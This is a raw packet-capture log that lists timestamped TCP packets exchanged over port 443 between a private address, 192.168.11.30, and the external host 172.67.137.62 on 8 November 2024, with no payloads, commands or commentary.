                                                                                                                          Nov 8, 2024 10:59:45.312356949 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.312443972 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.312573910 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.313859940 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.313867092 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.313977003 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.314054012 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.314059019 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.314145088 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.315073013 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.315082073 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.315227032 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.315231085 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.315395117 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.316890001 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.316896915 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.316951990 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.317073107 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.317176104 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.317179918 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.318650961 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.318660021 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.318814993 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.318820000 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.318878889 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.318983078 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.319350004 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.319555998 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.492937088 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.492950916 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.493055105 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.493151903 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.493227959 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.493237019 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.493318081 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.493807077 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.493818998 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.493952036 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.493957996 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.494060040 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.494148016 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.495434999 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.495445013 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.495636940 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.495636940 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.495687962 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.495692968 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.495776892 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.496661901 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.496687889 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.496803999 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.496818066 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.496998072 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.497739077 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.497811079 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.497958899 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.497967958 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.498059034 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.498841047 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.498858929 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.498925924 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.499026060 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.499033928 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.499072075 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.499207020 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.500823021 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.500837088 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.500972986 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.501131058 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.501137972 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.501348972 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.501499891 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.501660109 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.501744032 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.501744032 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.501751900 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.501898050 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.502746105 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.502760887 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.502887011 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.502937078 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.502937078 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.502943993 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.503031969 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.503106117 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.503993988 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.504023075 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.504136086 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.504136086 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.504343033 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.504348040 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.504431963 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.505019903 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.505064011 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.505213022 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.505220890 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.505314112 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.506561041 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.506572962 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.506719112 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.506726027 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.506798029 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.507050037 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.508022070 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.508030891 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.508191109 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.508191109 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.508250952 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.508260965 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.508528948 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.509277105 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.509288073 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.509634018 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.509644032 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.510170937 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.510183096 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.510428905 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.510438919 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.510560036 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.511852980 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.511863947 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.512023926 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.512034893 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.512244940 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.513382912 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.513394117 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.513634920 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.513642073 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.513739109 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.514266968 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.514276981 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.514484882 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.514496088 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.514507055 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.514678001 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.515779018 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.515789986 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.515952110 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.515952110 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.516006947 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.516016960 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.516134977 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.517164946 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.517177105 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.517369032 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.517379045 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.517498970 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.518541098 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.518548965 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.518812895 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.518822908 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.518918037 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.519584894 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.519597054 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.519757986 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.519768000 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.519834995 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.519928932 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.521202087 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.521214008 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.521498919 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.521505117 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.521647930 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.522413969 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.522425890 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.522630930 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.522640944 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.522737980 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.523830891 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.523839951 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.524080992 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.524091959 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.524209976 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.524816036 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.524826050 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.525001049 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.525011063 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.525080919 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.525204897 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.526479959 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.526489973 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.526690006 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.526766062 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.526772022 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.527510881 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.527523041 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.527693033 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.527703047 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.527754068 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.528037071 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.529094934 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.529104948 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.529472113 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.529481888 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.530005932 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.530015945 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.530303955 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.530316114 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.530397892 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.531645060 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.531652927 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.531820059 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.531830072 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.531860113 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.532015085 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.532768965 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.532778025 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.532953978 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.533102036 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.533111095 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.534255028 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.534266949 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.534437895 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.534449100 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.534516096 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.534632921 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.535299063 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.535309076 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.535634995 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.535645008 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.536978006 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.536990881 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.537102938 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.537115097 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.537168026 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.537168026 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.537240028 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.537292004 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.537992954 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.538006067 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.538167000 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.538348913 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.538355112 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.539527893 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.539542913 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.539716959 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.539727926 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.539794922 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.539870977 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.540534973 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.540549040 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.540782928 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.540793896 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.540859938 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.542087078 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.542098999 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.542263985 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.542273998 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.542345047 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.542603016 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.543272972 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.543287039 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.543435097 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.543488026 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.543488026 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.543499947 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.543800116 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.544696093 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.544707060 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.544891119 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.545062065 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.545072079 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.545633078 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.545646906 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.545800924 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.545810938 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.545875072 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.545983076 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.547451019 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.547466040 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.547617912 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.547827005 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.547832966 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.548530102 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.548546076 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.548712969 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.548722982 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.548790932 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.548907995 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.550000906 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.550017118 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.550168037 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.550220013 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.550301075 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.550312042 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.550335884 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.550877094 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.550888062 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.551064014 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.551069975 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.551184893 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.551248074 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.552634001 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.552648067 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.552942038 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.552942038 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.552953005 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.553663969 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.553680897 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.553834915 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.553844929 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.553915977 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.554160118 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.555164099 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.555175066 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.555342913 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.555589914 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.555599928 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.556159973 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.556174994 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.556410074 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.556421995 CET44349754172.67.137.62192.168.11.30
